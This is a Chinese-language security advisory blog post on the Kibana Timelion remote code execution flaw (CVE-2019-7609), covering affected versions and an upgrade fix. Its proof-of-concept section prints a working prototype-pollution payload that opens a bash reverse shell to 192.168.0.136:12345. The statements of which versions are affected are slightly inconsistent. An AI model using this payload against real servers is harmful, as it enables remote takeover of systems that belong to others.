最新漏洞预警Kibana远程代码执行漏洞
Posted 黑客信徒
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了最新漏洞预警Kibana远程代码执行漏洞相关的知识,希望对你有一定的参考价值。
Kibana < 6.6.0 代码执行漏洞
一:漏洞描述
Kibana是一个开源的分析和可视化平台,常被用于和Elasticsearch一起工作。用Kibana来搜索、查看、并和存储在Elasticsearch索引中的数据进行交互。可以轻松地执行高级数据分析,并且以各种图标、表格和地图的形式可视化数据。做运维的大佬们对他应该特别熟悉。
昨天下午小编喝完美女同事送的奶茶后,精神异常抖擞。就在今天凌晨,小编监测到小于6.6.0版本的Kibana被曝出存在远程代码执行漏洞(remote code execution)。
该漏洞存在于Kibana节点的环境变量中,攻击者能够通过污染的节点环境变量来执行任意javascript代码。从而直接接管服务器。危害较大!!!
二:漏洞等级
高危
三:漏洞攻击演示
POC:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
漏洞利用:
触发漏洞后即可拿到服务器权限,执行任意命令。
该漏洞只影响小于6.6.1的版本。目前kibana最新版是7.4.0。小编扫了300多个公网可访问的kibana系统,发现没一个存在漏洞的。不知道公司内网使用低版本的多不多。请使用该系统的尽快排查一下是否受影响。
四:影响范围
Kibana < 5.6.15
Kibana < 6.6.1
五:解决方案
可通过以下链接升级到Kibana版本6.6.1或5.6.15。
https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077
小编会实时跟进该漏洞的实时进展
关于漏洞更多详情、疑惑 随时留言!有问必答!
第一时间 实时 获取最新漏洞预警
以上是关于最新漏洞预警Kibana远程代码执行漏洞的主要内容,如果未能解决你的问题,请参考以下文章
高危安全预警Kibana < 6.6.1远程命令执行漏洞(CVE-2019-7609)